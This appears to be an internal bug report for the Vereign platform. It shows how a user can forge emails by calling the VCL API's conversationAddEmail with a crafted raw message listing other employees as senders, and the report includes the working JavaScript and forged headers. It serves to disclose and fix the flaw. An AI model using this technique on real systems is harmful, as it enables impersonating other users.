Check that user doesn't have the ability to create a fake email. As an example user had ability to add an email to the Vereign without real sending email from Gmail by using direct VCL API

1. Go to any env. From example https://staging.vereign.com

2. Getting access to the VCL:

lib = await window.setupViamAPI(
        "root",
        {
          onEvent: () => {}
        },
        `${document.location.origin}/vcl/js/iframe`,
        `${document.location.origin}/api/`,
        `${document.location.origin}/wopi/`,
        `${document.location.origin}`
      )

3. For now the User able to add conversation to the system by calling conversationAddEmail with some prepared message.

In the example bellow you can see that I used two emails in the From field: gospodin.bodurov@vereign.com,kalin.canov@vereign.com, and one email in the To field: alexey.lunin@vereign.com So in our system this message is displayed as message which was sent from above two addresses.

send = async (passportId, messageId) => {
    return await lib.conversationAddEmail(passportId, `Delivered-To: example@example.com
Received: by 2002:a4f:f651:0:0:0:0:0 with SMTP id c17csp869211ivp;
        Mon, 1 Apr 2019 15:19:05 -0700 (PDT)
X-Google-Smtp-Source: APXvYqxH/ypATs94L1JJKnqdeoXCP3xprGTgaqlMfN4RVQs6oZXs3OU459etudz7udpaYH6c+Mro
X-Received: by 2002:a50:b309:: with SMTP id q9mr43778263edd.91.1554157144953;
        Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
ARC-Seal: i=1; a=rsa-sha256; t=1554157144; cv=none;
        d=google.com; s=arc-20160816;
        b=HkM1GJyThICcJ6P51pPkegCoQqoXzpy6+93fYLEK1zYf8aKaZJqMPWn+6S31oQc0x8
         zszOmUoMlM3mrn7BIGNNtnnJeBjJujltM68prWe7Xf/iRE1NIHpLLaw8AdEHicmPKuyK
         dRTMfbuxXfl4pGSdO3kd+MU2Z/ftq6sedlwNgsUwziNA8mQ7CLTTCHrX2emSalIX6ao8
         PLGVD2IGTuIhfI+9vt4VCRPXIEYZ0WmCEVtCk1UYiSIGQQBCJUTeVRHUsuez3WbZy+Bm
         ipG8G5guW6v0ITQtTLNkDFsRdr2jcUcyWlJNc/gaTtdjq3iaBTu/gRt4qK/mHIfWiDkb
         HwGA==
ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816;
        h=to:subject:mime-version:message-id:from:date:dkim-signature
         :mime-version;
        bh=PpaT4m835AW80DsP2mo2xZT/LYgNpBTg/TeA1fTy0vI=;
        b=Sa2Efe1rL8J6OHXHx2BFRIje2ROT+Q6BrdDoW5ySvvKtHYtTa/ztgWB0kJTmWw1tOL
         Rybn8or7vzo2bCUrWp+qMmnzjFiRyyuLColBQKMg8FWH9jB0/2Ju2TsirgiDtywGaPXr
         IGR7K62hySlqWeCskDW84N4aWaiszqD7C0n6K55ofCPpEBvCcY8gER6AFloJt7g/YBdu
         2so3aipQPUM1B9OqfngMOgR9LlQ2GbjyvGckvfCt47ZsBWK9yntPCfhwMAtU1oWmeWKV
         k1arETsmUymnDKmd6hu2kjXEsgDZMg4xfoHHFVI4Bd0P+RZ4aEAmXzcPQ6R6Es6RfdBf
         ++gw==
ARC-Authentication-Results: i=1; mx.google.com;
       dkim=pass header.i=@gmail.com header.s=dc1 header.b="HcK939/F";
       spf=pass (: domain of alexey.lunin@vereign.com designates 0.0.0.0 as permitted sender) smtp.mailfrom=example@example.com
Return-Path: <example@example.com>
Received: from example.com (dc1.example.com. [0.0.0.])
        by mx.google.com with ESMTPS id p7si128062edm.32.2019.04.01.15.19.04
        for <example@example.com>
        (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128);
        Mon, 01 Apr 2019 15:19:04 -0700 (PDT)
Received-SPF: pass (google.com: domain of example@example.com designates 0.0.0.0 as permitted sender) client-ip=0.0.0.0;
Authentication-Results: mx.example.com;
       dkim=pass header.i=@example.com header.s=dc1 header.b="HcK939/F";
       spf=pass (example.com: domain of example@example.com designates 0.0.0.0 as permitted sender) smtp.mailfrom=example@example.com
MIME-Version: 1.0
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=vereign.com; s=dc1;
    t=1554157143; bh=iFoLXx49XxW84s0w5bUyL8lo3y8Od4fHlKuFW9yWPTU=;
    h=Date:From:Subject:To;
    b=HcK939/Ft71xO/AR6Uhb5mPDR1ukfE4qrAU8cNxicxpiZogYjNqOTPGysneIT3os/
     unRVcWvAVv1DXZsNFsbEd8r6476mi9aem1OGRp5SGntVSVZOHsFKOuYTuraRKOKKB1
     /rUEUinaJe96ZDzjUty5WdX3c8q4eRN91EDREay8=
Date: Tue, 02 Apr 2019 02:19:00 +0400
From: gospodin.bodurov@vereign.com,kalin.canov@vereign.com
Message-Id: <fc084f35441ba5${messageId}@example.com>
Mime-Version: 1.0
Subject: [Security] Checking archiving email without real email sending
To: alexey.lunin@vereign.com

--=_d2d1e6ddf837fd97c34cc2953b26d72d
Content-Type: multipart/related; boundary="3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e"


--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

<html><head><title>Vereign - Authentic Communication</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8" />=
</head><body style=3D'font-size: 10pt; font-family: Verdana,Geneva,sans-ser=
if'>
<p>Just checking that I can send a message from gospodin.bodurov@vereign.com and kalin.canov@vereign.com accounts without accessing to them with using my personal passport id</p>
</body></html>

--3fa1d0258d6e0c8cd3b6c983df6c007a9c19d2d68379efef3ad72df6ea6e--
--=_d2d1e6ddf837fd97c34cc2953b26d72d--
--W0RyLiBEYW15YW4gTWl0ZXZd--ck5GzsRpPFPCGD5mmbat8rPQSG0y1wq5GemKV--
Vereign - Authentic Communication`)
}

await send("7a1a1be2-a937-44bb-81db-64e82809b793", Math.random())

changed the description

changed the description

assigned to @alexey.lunin

mentioned in issue #48

BE work:

• Check that user didn't modify From: field, and this field really belongs to the current vereign user account. Bug: For now I can put any email here.

• We are signing content and we have certificate for this content. I think we can somehow check validity of certificate and check that this certificate really belongs to this content.

In the example above I removed any certificate and message anyway was added. And before that, I used some another certificate in the email message with modified content. So, we can add checking that cert is valid and content was not modified for this cert

added NeedForProduction backend labels

unassigned @alexey.lunin